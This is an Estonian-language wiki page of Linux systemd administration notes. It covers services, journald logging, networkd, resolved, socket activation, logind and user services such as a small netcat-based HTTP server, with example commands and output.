# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

